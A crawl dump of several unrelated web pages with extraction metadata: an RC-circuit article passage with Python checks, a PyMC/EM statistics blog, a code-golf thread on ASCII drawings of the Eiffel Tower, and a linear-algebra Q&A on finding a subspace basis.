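R, C, V0 = 1.0e3, 1.0e-6, 5.0   # 1 kOhm, 1 uF, 5 V initial charge (arbitrary)
tau = R * C                      # time constant: 1 ms here
dt, v, t = tau / 20000.0, V0, 0.0

# Forward-Euler integration of C*dV/dt + V/R = 0, i.e. dV/dt = -V/(RC)
while t < 3.0 * tau:
    v += dt * (-v / (R * C))
    t += dt

analytic = V0 * math.exp(-t / (R * C))
assert abs(v - analytic) / analytic < 1e-3   # Euler tracks V0*exp(-t/RC)
```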
## Complex impedance
The complex impedance, ZC (in ohms) of a capacitor with capacitance C (in farads) is
${\displaystyle Z_{C}={\frac {1}{sC}}}$
The complex frequency s is, in general, a complex number,
${\displaystyle s\ =\ \sigma +j\omega }$
where
• ${\displaystyle j}$ represents the imaginary unit:
${\displaystyle j^{2}=-1}$
### Sinusoidal steady state
Sinusoidal steady state is a special case in which the input voltage consists of a pure sinusoid (with no exponential decay). As a result,
${\displaystyle \sigma \ =\ 0}$
and the evaluation of s becomes
${\displaystyle s\ =\ j\omega }$
## Series circuit
Series RC circuit
By viewing the circuit as a voltage divider, the voltage across the capacitor is:
${\displaystyle V_{C}(s)={\frac {1/Cs}{R+1/Cs}}V_{\rm {in}}(s)={\frac {1}{1+RCs}}V_{\rm {in}}(s)}$
and the voltage across the resistor is:
${\displaystyle V_{R}(s)={\frac {R}{R+1/Cs}}V_{\rm {in}}(s)={\frac {RCs}{1+RCs}}V_{\rm {in}}(s)}$.
### Transfer functions
The transfer function from the input voltage to the voltage across the capacitor is
${\displaystyle H_{C}(s)={V_{C}(s) \over V_{\rm {in}}(s)}={1 \over 1+RCs}}$.
Similarly, the transfer function from the input to the voltage across the resistor is
${\displaystyle H_{R}(s)={V_{R}(s) \over V_{\rm {in}}(s)}={RCs \over 1+RCs}}$.
#### Poles and zeros
Both transfer functions have a single pole located at
${\displaystyle s=-{1 \over RC}}$ .
In addition, the transfer function for the resistor has a zero located at the origin.
### Gain and phase
The magnitude of the gains across the two components are:
${\displaystyle G_{C}=|H_{C}(j\omega )|=\left|{\frac {V_{C}(j\omega )}{V_{\rm {in}}(j\omega )}}\right|={\frac {1}{\sqrt {1+\left(\omega RC\right)^{2}}}}}$
and
${\displaystyle G_{R}=|H_{R}(j\omega )|=\left|{\frac {V_{R}(j\omega )}{V_{\rm {in}}(j\omega )}}\right|={\frac {\omega RC}{\sqrt {1+\left(\omega RC\right)^{2}}}}}$,
and the phase angles are:
${\displaystyle \phi _{C}=\angle H_{C}(j\omega )=\tan ^{-1}\left(-\omega RC\right)}$
and
${\displaystyle \phi _{R}=\angle H_{R}(j\omega )=\tan ^{-1}\left({\frac {1}{\omega RC}}\right)}$.
These expressions together may be substituted into the usual expression for the phasor representing the output:
${\displaystyle V_{C}\ =\ G_{C}V_{\rm {in}}e^{j\phi _{C}}}$
${\displaystyle V_{R}\ =\ G_{R}V_{in}e^{j\phi _{R}}}$.
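Two identities implicit in these expressions can be verified numerically: the gains satisfy $G_C^2 + G_R^2 = 1$ at every frequency, and the resistor voltage always leads the capacitor voltage by exactly 90°. A sketch using Python's built-in complex arithmetic, with arbitrary component values:

```python
import cmath, math

R, C = 1.0e3, 1.0e-6                 # arbitrary example values
for f in (10.0, 159.0, 1.0e4):       # a few frequencies in Hz
    w = 2.0 * math.pi * f
    Hc = 1.0 / (1.0 + 1j * w * R * C)                # capacitor transfer function
    Hr = (1j * w * R * C) / (1.0 + 1j * w * R * C)   # resistor transfer function
    Gc, Gr = abs(Hc), abs(Hr)
    assert abs(Gc ** 2 + Gr ** 2 - 1.0) < 1e-12
    # phase(Hr) - phase(Hc) = pi/2 at every frequency
    assert abs((cmath.phase(Hr) - cmath.phase(Hc)) - math.pi / 2) < 1e-12
```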
### Current
The current in the circuit is the same everywhere since the circuit is in series:
${\displaystyle I(s)={\frac {V_{\rm {in}}(s)}{R+{\frac {1}{Cs}}}}={Cs \over 1+RCs}V_{\rm {in}}(s)}$
### Impulse response
The impulse response for each voltage is the inverse Laplace transform of the corresponding transfer function. It represents the response of the circuit to an input voltage consisting of an impulse or Dirac delta function.
The impulse response for the capacitor voltage is
${\displaystyle h_{C}(t)={1 \over RC}e^{-t/RC}u(t)={1 \over \tau }e^{-t/\tau }u(t)}$
where u(t) is the Heaviside step function and
${\displaystyle \tau \ =\ RC}$
is the time constant.
Similarly, the impulse response for the resistor voltage is
${\displaystyle h_{R}(t)=\delta (t)-{1 \over RC}e^{-t/RC}u(t)=\delta (t)-{1 \over \tau }e^{-t/\tau }u(t)}$
where δ(t) is the Dirac delta function
### Frequency-domain considerations
These are frequency domain expressions. Analysis of them will show which frequencies the circuits (or filters) pass and reject. This analysis rests on a consideration of what happens to these gains as the frequency becomes very large and very small.
As ${\displaystyle \omega \to \infty }$:
${\displaystyle G_{C}\to 0}$
${\displaystyle G_{R}\to 1}$.
As ${\displaystyle \omega \to 0}$:
${\displaystyle G_{C}\to 1}$
${\displaystyle G_{R}\to 0}$.
This shows that, if the output is taken across the capacitor, high frequencies are attenuated (shorted to ground) and low frequencies are passed. Thus, the circuit behaves as a low-pass filter. If, though, the output is taken across the resistor, high frequencies are passed and low frequencies are attenuated (since the capacitor blocks the signal as its frequency approaches 0). In this configuration, the circuit behaves as a high-pass filter.
The range of frequencies that the filter passes is called its bandwidth. The point at which the filter attenuates the signal to half its unfiltered power is termed its cutoff frequency. This requires that the gain of the circuit be reduced to
${\displaystyle G_{C}=G_{R}={\frac {1}{\sqrt {2}}}}$.
Solving the above equation yields
${\displaystyle \omega _{c}={\frac {1}{RC}}}$
or
${\displaystyle f_{c}={\frac {1}{2\pi RC}}}$
which is the frequency that the filter will attenuate to half its original power.
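For concreteness, with made-up values R = 1 kΩ and C = 100 nF the cutoff is about 1.59 kHz, and the low-pass gain there is indeed 1/√2 (half power):

```python
import math

R, C = 1.0e3, 100.0e-9              # example values: 1 kOhm, 100 nF
fc = 1.0 / (2.0 * math.pi * R * C)  # cutoff frequency, about 1591.5 Hz

wc = 2.0 * math.pi * fc
Gc = abs(1.0 / (1.0 + 1j * wc * R * C))   # low-pass gain at the cutoff

assert abs(fc - 1591.55) < 0.01
assert abs(Gc - 1.0 / math.sqrt(2.0)) < 1e-12
assert abs(Gc ** 2 - 0.5) < 1e-12   # half power at the cutoff
```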
Clearly, the phases also depend on frequency, although this effect is less interesting generally than the gain variations.
As ${\displaystyle \omega \to 0}$:
${\displaystyle \phi _{C}\to 0}$
${\displaystyle \phi _{R}\to 90^{\circ }=\pi /2^{c}}$.
As ${\displaystyle \omega \to \infty }$:
${\displaystyle \phi _{C}\to -90^{\circ }=-\pi /2^{c}}$
${\displaystyle \phi _{R}\to 0}$
So at DC (0 Hz), the capacitor voltage is in phase with the signal voltage while the resistor voltage leads it by 90°. As frequency increases, the capacitor voltage comes to have a 90° lag relative to the signal and the resistor voltage comes to be in-phase with the signal.
### Time-domain considerations
This section relies on knowledge of e, the base of the natural logarithm.
The most straightforward way to derive the time domain behaviour is to use the Laplace transforms of the expressions for ${\displaystyle V_{C}}$ and ${\displaystyle V_{R}}$ given above. This effectively transforms ${\displaystyle j\omega \to s}$. Assuming a step input (i.e. ${\displaystyle V_{in}=0}$ before ${\displaystyle t=0}$ and then ${\displaystyle V_{in}=V}$ afterwards):
${\displaystyle V_{\rm {in}}(s)=V{\frac {1}{s}}}$
${\displaystyle V_{C}(s)=V{\frac {1}{1+sRC}}{\frac {1}{s}}}$
and
${\displaystyle V_{R}(s)=V{\frac {sRC}{1+sRC}}{\frac {1}{s}}}$.
Capacitor voltage step-response.
Resistor voltage step-response.
Partial fractions expansions and the inverse Laplace transform yield:
${\displaystyle \,\!V_{C}(t)=V\left(1-e^{-t/RC}\right)}$
${\displaystyle \,\!V_{R}(t)=Ve^{-t/RC}}$.
These equations give the voltage across the capacitor and resistor respectively while the capacitor is charging; for discharging, the two expressions are interchanged. These equations can be rewritten in terms of charge and current using the relationships C = Q/V and V = IR (see Ohm's law).
Thus, the voltage across the capacitor tends towards V as time passes, while the voltage across the resistor tends towards 0, as shown in the figures. This is in keeping with the intuitive point that the capacitor will be charging from the supply voltage as time passes, and will eventually be fully charged.
These equations show that a series RC circuit has a time constant, usually denoted ${\displaystyle \tau =RC}$ being the time it takes the voltage across the component to either rise (across C) or fall (across R) to within ${\displaystyle 1/e}$ of its final value. That is, ${\displaystyle \tau }$ is the time it takes ${\displaystyle V_{C}}$ to reach ${\displaystyle V(1-1/e)}$ and ${\displaystyle V_{R}}$ to reach ${\displaystyle V(1/e)}$.
The rate of change is a fractional ${\displaystyle \left(1-{\frac {1}{e}}\right)}$ per ${\displaystyle \tau }$. Thus, in going from ${\displaystyle t=N\tau }$ to ${\displaystyle t=(N+1)\tau }$, the voltage will have moved about 63.2% of the way from its level at ${\displaystyle t=N\tau }$ toward its final value. So C will be charged to about 63.2% after ${\displaystyle \tau }$, and essentially fully charged (99.3%) after about ${\displaystyle 5\tau }$. When the voltage source is replaced with a short-circuit, with C fully charged, the voltage across C drops exponentially with t from ${\displaystyle V}$ towards 0. C will be discharged to about 36.8% after ${\displaystyle \tau }$, and essentially fully discharged (0.7%) after about ${\displaystyle 5\tau }$. Note that the current, ${\displaystyle I}$, in the circuit behaves as the voltage across R does, via Ohm's Law.
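The percentages quoted here are just values of the exponential function, and can be checked in a few lines:

```python
import math

# Charging: fraction of the final value reached after 1 and 5 time constants
assert abs((1.0 - math.exp(-1.0)) - 0.632) < 0.001   # ~63.2% after tau
assert abs((1.0 - math.exp(-5.0)) - 0.993) < 0.001   # ~99.3% after 5*tau

# Discharging: fraction of the initial value remaining
assert abs(math.exp(-1.0) - 0.368) < 0.001           # ~36.8% after tau
assert abs(math.exp(-5.0) - 0.007) < 0.001           # ~0.7% after 5*tau
```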
These results may also be derived by solving the differential equations describing the circuit:
${\displaystyle {\frac {V_{\rm {in}}-V_{C}}{R}}=C{\frac {dV_{C}}{dt}}}$
and
${\displaystyle \,\!V_{R}=V_{\rm {in}}-V_{C}}$.
The first equation is solved by using an integrating factor and the second follows easily; the solutions are exactly the same as those obtained via Laplace transforms.
#### Integrator
Consider the output across the capacitor at high frequency i.e.
${\displaystyle \omega \gg {\frac {1}{RC}}}$.
This means that the capacitor has insufficient time to charge up and so its voltage is very small. Thus the input voltage approximately equals the voltage across the resistor. To see this, consider the expression for ${\displaystyle I}$ given above:
${\displaystyle I={\frac {V_{in}}{R+1/j\omega C}}}$
but note that the frequency condition described means that
${\displaystyle \omega C\gg {\frac {1}{R}}}$
so
${\displaystyle I\approx {\frac {V_{in}}{R}}}$ which is just Ohm's Law.
Now,
${\displaystyle V_{C}={\frac {1}{C}}\int _{0}^{t}Idt}$
so
${\displaystyle V_{C}\approx {\frac {1}{RC}}\int _{0}^{t}V_{in}dt}$,
which is an integrator across the capacitor.
#### Differentiator
Consider the output across the resistor at low frequency i.e.,
${\displaystyle \omega \ll {\frac {1}{RC}}}$.
This means that the capacitor has time to charge up until its voltage is almost equal to the source's voltage. Considering the expression for ${\displaystyle I}$ again, when
${\displaystyle R\ll {\frac {1}{\omega C}}}$,
so
${\displaystyle I\approx {\frac {V_{in}}{1/j\omega C}}}$
${\displaystyle V_{in}\approx {\frac {I}{j\omega C}}=V_{C}}$
Now,
${\displaystyle V_{R}=IR=C{\frac {dV_{C}}{dt}}R}$
${\displaystyle V_{R}\approx RC{\frac {dV_{in}}{dt}}}$
which is a differentiator across the resistor.
More accurate integration and differentiation can be achieved by placing resistors and capacitors as appropriate on the input and feedback loop of operational amplifiers (see operational amplifier integrator and operational amplifier differentiator).
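Both approximations can be checked against the exact transfer functions: well above 1/RC the low-pass magnitude approaches 1/(ωRC) (integrating a sinusoid divides its amplitude by ω), and well below 1/RC the high-pass magnitude approaches ωRC (differentiating multiplies by ω). A sketch with arbitrary component values:

```python
import math

R, C = 1.0e3, 1.0e-6       # arbitrary values; the corner is at 1/RC = 1000 rad/s
wc = 1.0 / (R * C)

# Integrator regime: omega >> 1/RC, so |H_C| ~ 1/(omega*R*C)
w = 100.0 * wc
Gc = abs(1.0 / (1.0 + 1j * w * R * C))
assert abs(Gc - 1.0 / (w * R * C)) / Gc < 1e-3

# Differentiator regime: omega << 1/RC, so |H_R| ~ omega*R*C
w = wc / 100.0
Gr = abs((1j * w * R * C) / (1.0 + 1j * w * R * C))
assert abs(Gr - w * R * C) / Gr < 1e-3
```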
## Parallel circuit
Parallel RC circuit
The parallel RC circuit is generally of less interest than the series circuit. This is largely because the output voltage ${\displaystyle V_{out}}$ is equal to the input voltage ${\displaystyle V_{in}}$ — as a result, this circuit does not act as a filter on the input signal unless fed by a current source.
With complex impedances:
${\displaystyle I_{R}={\frac {V_{in}}{R}}\,}$
and
${\displaystyle I_{C}=j\omega CV_{in}\,}$.
This shows that the capacitor current is 90° out of phase with the resistor (and source) current. Alternatively, the governing differential equations may be used:
${\displaystyle I_{R}={\frac {V_{in}}{R}}}$
and
${\displaystyle I_{C}=C{\frac {dV_{in}}{dt}}}$.
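The 90° phase difference between the two branch currents can be confirmed directly from these expressions; the component values below are assumed for illustration only.

```python
import cmath, math

R, C, w = 1_000.0, 1e-6, 5_000.0   # assumed example values
Vin = 1.0 + 0.0j                   # take the source voltage as phase reference
IR = Vin / R                       # resistor current, in phase with the source
IC = 1j * w * C * Vin              # capacitor current
print(math.degrees(cmath.phase(IC) - cmath.phase(IR)))   # approximately 90 degrees
```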
When fed by a current source, the transfer function of a parallel RC circuit is:
${\displaystyle {\frac {V_{out}}{I_{in}}}={\frac {R}{1+sRC}}}$. | 2016-07-29 18:07:09 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 94, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7990937829017639, "perplexity": 660.1862899562925}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257831770.41/warc/CC-MAIN-20160723071031-00098-ip-10-185-27-174.ec2.internal.warc.gz"} |
https://healthyalgorithms.com/tag/pymc/page/2/ | # Tag Archives: pymc
## MCMC in Python: sampling in parallel with PyMC
Question and answer on Stack Overflow.
Filed under software engineering
## MCMC in Python: Estimating failure rates from observed data
A question and answer on CrossValidated, which made me reflect on the danger of knowing enough statistics to be dangerous.
Filed under statistics
## MCMC in Python: How to make a custom sampler in PyMC
The PyMC documentation is a little slim on the topic of defining a custom sampler, and I had to figure it out for some DisMod work over the years. Here is a minimal example of how I did it, in answer to a CrossValidated question.
Filed under MCMC
## MCMC in Python: How to set a custom prior with joint distribution on two parameters in PyMC
Filed under Uncategorized
## MCMC in Python: random effects logistic regression in PyMC3
It has been a while since I visited my pymc-examples repository, but I got a request there a few weeks ago about the feasibility of upgrading the Seeds Example of a random effects logistic regression model for PyMC3. It turns out that this was not very time consuming, which must mean I’m starting to understand the changes between PyMC2 and PyMC3.
See them side-by-side here (PyMC2) and here (PyMC3).
Filed under statistics
## Sequential Monte Carlo in PyMC?
I’ve been reading about Sequential Monte Carlo recently, and I think it will fit well into the PyMC3 framework. I will give it a try when I have a free minute, but maybe someone else will be inspired to try it first. This paper includes some pseudocode.
Filed under MCMC
## PyMC3 coming along
I have been watching the development of PyMC3 from a distance for some time now, and finally have had a chance to play around with it myself. It is coming along quite nicely! Here is a notebook Kyle posted to the mailing list recently which has a clean demonstration of using Normal and Laplace likelihoods in linear regression: http://nbviewer.ipython.org/c212194ecbd2ee050192/variable_selection.ipynb
Filed under statistics
## Regression Modeling in Python: Patsy Spline
I’ve been watching the next generation of PyMC come together over the last months, and there is some very exciting stuff happening. The part on GLM regression led me to a different project which is also of interest, a regression modeling minilanguage, called Patsy which “brings the convenience of R ‘formulas’ to Python.”
This package recently introduced a method for spline regression, and avoided all puns in naming. Impressive.
Filed under statistics
## ML in Python: Naive Bayes the hard way
A recent question on the PyMC mailing list inspired me to make a really inefficient version of the Naive Bayes classifier. Enjoy.
Filed under machine learning
## Classic EM in Python: Multinomial sampling
In the classic paper on the EM algorithm, the extensive example section begins with a multinomial modeling example that is theoretically very similar to the warm-up problem on 197 animals:
We can think of the complete data as an $n \times p$ matrix $x$ whose $(i,j)$ element is unity if the $i$-th unit belongs in the $j$-th of $p$ possible cells, and is zero otherwise. The $i$-th row of $x$ contains $p-1$ zeros and one unity, but if the $i$-th unit has incomplete data, some of the indicators in the $i$-th row of $x$ are observed to be zero, while the others are missing and we know only that one of them must be unity. The E-step then assigns to the missing indicators fractions that sum to unity within each unit, the assigned values being expectations given the current estimate of $\phi$. The M-step then becomes the usual estimation of $\phi$ from the observed and assigned values of the indicators summed over the units.
In practice, it is convenient to collect together those units with the same pattern of missing indicators, since the filled in fractional counts will be the same for each; hence one may think of the procedure as filling in estimated counts for each of the missing cells within each group of units having the same pattern of missing data.
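As a concrete illustration of the fill-in procedure described in the quote, here is the 197-animals warm-up problem in a few lines of Python. The cell probabilities (1/2 + pi/4, (1-pi)/4, (1-pi)/4, pi/4) and the counts (125, 18, 20, 34) are the ones from the Dempster-Laird-Rubin paper; the code itself is just my sketch and is separate from the PyMC model below.

```python
# Observed counts; the first cell (125) is really the sum of two latent
# cells with probabilities 1/2 and pi/4.
y1, y2, y3, y4 = 125, 18, 20, 34
pi = 0.5                      # initial guess
for _ in range(50):
    # E-step: expected count of the latent pi/4 sub-cell hidden inside y1.
    x12 = y1 * (pi / 4) / (1 / 2 + pi / 4)
    # M-step: maximum-likelihood update of pi from the completed counts.
    pi = (x12 + y4) / (x12 + y2 + y3 + y4)
print(round(pi, 4))           # converges to about 0.6268
```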
When I first made some data to try this out, it looked like this:
import pymc as mc, numpy as np, pandas as pd, random
n = 100000
p = 5
pi_true = mc.rdirichlet(np.ones(p))
pi_true = np.hstack([pi_true, 1-pi_true.sum()])
x_true = mc.rmultinomial(1, pi_true, size=n)
x_obs = np.array(x_true, dtype=float)
for i in range(n):
for j in random.sample(range(p), 3):
x_obs[i,j] = np.nan
At first, I was pretty pleased with myself when I managed to make a PyMC model and an E-step and M-step that converged to something like the true value of $\pi$. The model is not super slick:
pi = mc.Uninformative('pi', value=np.ones(p)/p)
x_missing = np.isnan(x_obs)
x_initial = x_obs.copy()
x_initial[x_missing] = 0.
for i in range(n):
if x_initial[i].sum() == 0:
j = np.where(x_missing[i])[0][0]
x_initial[i,j] = 1.
@mc.stochastic
def x(pi=pi, value=x_initial):
return mc.multinomial_like(value, 1, pi)
@mc.observed
def y(x=x, value=x_obs):
if np.allclose(x[~x_missing], value[~x_missing]):
return 0
else:
return -np.inf
And the E-step/M-step parts are pretty simple:
def E_step():
x_new = np.array(x_obs, dtype=float)
for i in range(n):
if x_new[i, ~x_missing[i]].sum() == 0:
conditional_pi_sum = pi.value[x_missing[i]].sum()
for j in np.where(x_missing[i])[0]:
x_new[i,j] = pi.value[j] / conditional_pi_sum
else:
x_new[i, x_missing[i]] = 0.
x.value = x_new
def M_step():
counts = x.value.sum(axis=0)
pi.value = (counts / counts.sum())
But the way the values converge does look nice:
The thing that made me feel silly was comparing this fancy-pants approach to the result of averaging all of the non-empty cells of x_obs:
ests = pd.DataFrame(dict(pr=pi_true, true=x_true.mean(0),
naive=pd.DataFrame(x_obs).mean(), em=pi.value),
columns=['pr', 'true', 'naive', 'em']).sort('true')
print np.round_(ests, 3)
pr true naive em
2 0.101 0.101 0.100 0.101
0 0.106 0.106 0.108 0.108
3 0.211 0.208 0.209 0.208
1 0.269 0.271 0.272 0.271
4 0.313 0.313 0.314 0.313
Simple averages are just as good as EM, for the simplest distribution I could think of based on the example, anyways.
To see why this EM business is worth the effort requires a more elaborate model of missingness. I made one, but it is a little bit messy. Can you make one that is nice and neat?
Filed under statistics, Uncategorized | 2021-04-15 15:00:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 15, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5320794582366943, "perplexity": 1856.7467186705846}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038085599.55/warc/CC-MAIN-20210415125840-20210415155840-00525.warc.gz"} |
https://codegolf.stackexchange.com/questions/23581/eiffel-tower-in-3d | # Eiffel Tower in 3D
This challenge asks you to draw the Eiffel Tower in 3D using different ASCII characters to represent the different sides, similar to this cube:
@@@
@@@@@@@@@
@@@@@@@@@@@@@@@
x@@@@@@@@@@@@&&
xxx@@@@@@@@&&&&
xxxxx@@@&&&&&&&
xxxxxx&&&&&&&&&
xxxxx&&&&&&&
xxx&&&&
x&&
Here is a picture of the Eiffel Tower for you to base your art on:
Your program will input a rotational angle of the side view, then print the Tower as if you were looking at it from that angle. The up/down angle does not need to be accounted for.
Score will be calculated as 1.25*votes - 0.25*length. Highest score wins.
• Accounting for the view angle is going to be a vexing/fun challenge. – Jonathan Van Matre Mar 9 '14 at 19:47
BBC BASIC, 66 chars
Emulator at bbcbasic.co.uk
A=PI/6FORJ=0TO83PRINTTAB(9+EXP(J/40)*SIN(A+J*PI/2),J/4);J MOD4:NEXT
With white space for clarity:
A=PI/6
FOR J=0 TO 83
PRINT TAB(9+EXP(J/40)*SIN(A+J*PI/2),J/4);J MOD4
NEXT
Input is hard coded in radians. Taking user input would add one character, but user would have to input in radians. Removing the MOD4 from the end would still produce a recognisable tower, but might violate the rule regarding character per side.
Basically plots a string of zeros at exp(J/40)*sin(A) vs J/4. Additional values of the sin are added for the remaining three legs.
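For anyone without a BBC BASIC emulator handy, here is a rough Python approximation of the same idea; the TAB(x, y) cursor positioning is emulated with a per-row buffer, and the BASIC version's rounding is only approximated:

```python
import math

A = math.pi / 6                      # hard-coded view angle, as in the BASIC code
rows = [dict() for _ in range(21)]   # 84 plotted points, 4 per text row
for J in range(84):
    x = round(9 + math.exp(J / 40) * math.sin(A + J * math.pi / 2))
    rows[J // 4][x] = str(J % 4)     # J MOD 4 marks which leg the point is on
for cols in rows:
    print(''.join(cols.get(c, ' ') for c in range(max(cols) + 1)))
```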
• I hesitated to post this as I thought it was perhaps a little lazy. Then I saw the "500km away" answer and thought, why not! – Level River St Mar 9 '14 at 20:42
• Not bad, a lot better than "500km away" answer. At least you can tell what it is! – user10766 Mar 9 '14 at 20:53
• Looks more like a rocket. – Mukul Kumar Mar 10 '14 at 4:26
# PHP, 364 * 0.25 = 91
Accepts a viewing angle as a query string parameter of the form ?a=0, ?a=45, ?a=90, etc.
<pre><?php
$a=45*floor(.5+intval(@$_GET['a'])/45);
$e=array(array(".","|","==","X|","X|","X/","==|","^||","-./","__//","=====","^^-. /"," |__|"), array(".","|","==","X|","X|","X/","|=|","|^|","|./"," ///",":====",":|-. /","_| |_|")); echo "Angle: {$a}°\n\n";
foreach($e[$a&1] as $s){$p=str_pad($s,7);echo strrev($p).substr(strtr($p,'/','\\'),1)."\n";} ?>
</pre>
Examples:
a=135
Angle: 135°
.
|
===
|X|
|X|
/X\
|=|=|
|^|^|
/.|.\
/// \\\
====:====
/ .-|:|-. \
|_| |_| |_|
a=200 (rounded to nearest increment = 180°)
Angle: 180°
.
|
===
|X|
|X|
/X\
|===|
||^||
/.-.\
//___\\
=========
/ .-^^^-. \
|__| |__|
(Yes I know, the angular resolution isn't brilliant. I'll improve on that if I have time.)
# C# - 64 bytes
namespace System{class m{static void h(){Console.Write(".");}}}
Prints the Eiffel Tower viewed from ~~500~~ 26.5 kilometers away. Takes the rotational angle as an argument.
Example usage:
eiffel.exe 90
# EDIT
I've made an approximation, and it should be about 26.5 kilometers away.
Let's consider the image below, taken from OP and edited to add a "." using the font Monospace 12 without anti-aliasing.
The "." is 2 pixels long and 1 pixels wide whereas the tower is 400 pixels long and 663 pixels wide(approximately).
Let's assume the tower is viewed from 100 meters away.
If we want to make it look like a 2x1 box, we would need to make it (again, approximately) 265.5 times smaller(200 times smaller for the height and 531 times smaller for the width).
If we multiply 265.5 with 100 meters, we get 26550 meters, which is 26.5 kilometers.
• There's a bug in your code. The output should be " " when viewed from 500km. – Comintern Mar 9 '14 at 20:21
• This is not funny. – John Dvorak Mar 9 '14 at 20:25
• @Comintern Actually no, it would be smaller than a . but bigger than an empty space. – user3188175 Mar 9 '14 at 20:37
• I'm less than 500km from the Eiffel Tower, but there's not a single pixel in view here :-D – r3mainer Mar 10 '14 at 15:26
• @squeamishossifrage Think of it as a view from space. Or even, assume it's in space. – user3188175 Mar 10 '14 at 15:49 | 2021-03-02 16:14:29 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.42305952310562134, "perplexity": 2506.413423916534}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178364027.59/warc/CC-MAIN-20210302160319-20210302190319-00215.warc.gz"} |
http://math.stackexchange.com/questions/231968/find-a-basis-for-the-set-of-vectors-in-mathbbr4-in-the-subspace-hyperplan?answertab=votes | # Find a basis for the set of vectors in $\mathbb{R}^4$ in the subspace (hyperplane) $x_1 +x_2 + 2x_3 + x_4 = 0, x_1 + 2x_2-x_3=0$
I am studying for a test, and this is one of the practice problems.
Find a basis for the set of vectors in $\mathbb{R}^4$ in the subspace (hyperplane) $x_1 +x_2 + 2x_3 + x_4 = 0, x_1 + 2x_2-x_3=0$
Can I say that the second plane is a linear combination of the first plane, and a basis for the first plane is $\{\begin{bmatrix} 1 & 0 & 0 & 1 \end{bmatrix}, \begin{bmatrix} 0 & 1 & 0 & -1 \end{bmatrix}, \begin{bmatrix} 0 & 0 & 2 & -2 \end{bmatrix}\}$, thus it is the basis for the hyperplane (both planes) in the subspace? If not, how do I find the basis?
-
Why is $(1,0,0,1)$ on the first plane? – wj32 Nov 7 '12 at 7:01
It might not be, I could be wrong. I just followed a heuristic I found online, since it doesn't seem to be in my textbook. – Grace C Nov 7 '12 at 7:08
Also, why do you say that the subspace is a hyperplane? It looks 2 dimensional to me. – wj32 Nov 7 '12 at 7:09
The actual problem itself says that in the question. – Grace C Nov 7 '12 at 7:11
Where is this problem from? – wj32 Nov 7 '12 at 7:18
I'm assuming you want to find a basis for the subspace $$S=\{(x_1,x_2,x_3,x_4) \in \mathbb{R}^4 \mid x_1+x_2+2x_3+x_4=0\;\mbox{and}\;x_1+2x_2-x_3=0\}.$$ The standard way to do this is to notice that $S$ is the kernel of the matrix $$\begin{bmatrix}1 & 1 & 2 & 1 \\ 1 & 2 & -1 & 0\end{bmatrix}.$$ Row reduce to get $$\begin{bmatrix}1 & 0 & 5 & 2 \\ 0 & 1 & -3 & -1\end{bmatrix}.$$ This tells you that a basis for $S$ is $\{(-5,3,1,0),(-2,1,0,1)\}$.
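One can double-check this answer by substituting both proposed basis vectors back into the two defining equations (plain Python, no linear-algebra library needed):

```python
# Rows of the coefficient matrix read off from the two equations.
A = [[1, 1, 2, 1],
     [1, 2, -1, 0]]
basis = [(-5, 3, 1, 0), (-2, 1, 0, 1)]
for v in basis:
    residuals = [sum(a * x for a, x in zip(row, v)) for row in A]
    print(v, residuals)   # residuals come out as [0, 0] for both vectors
```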
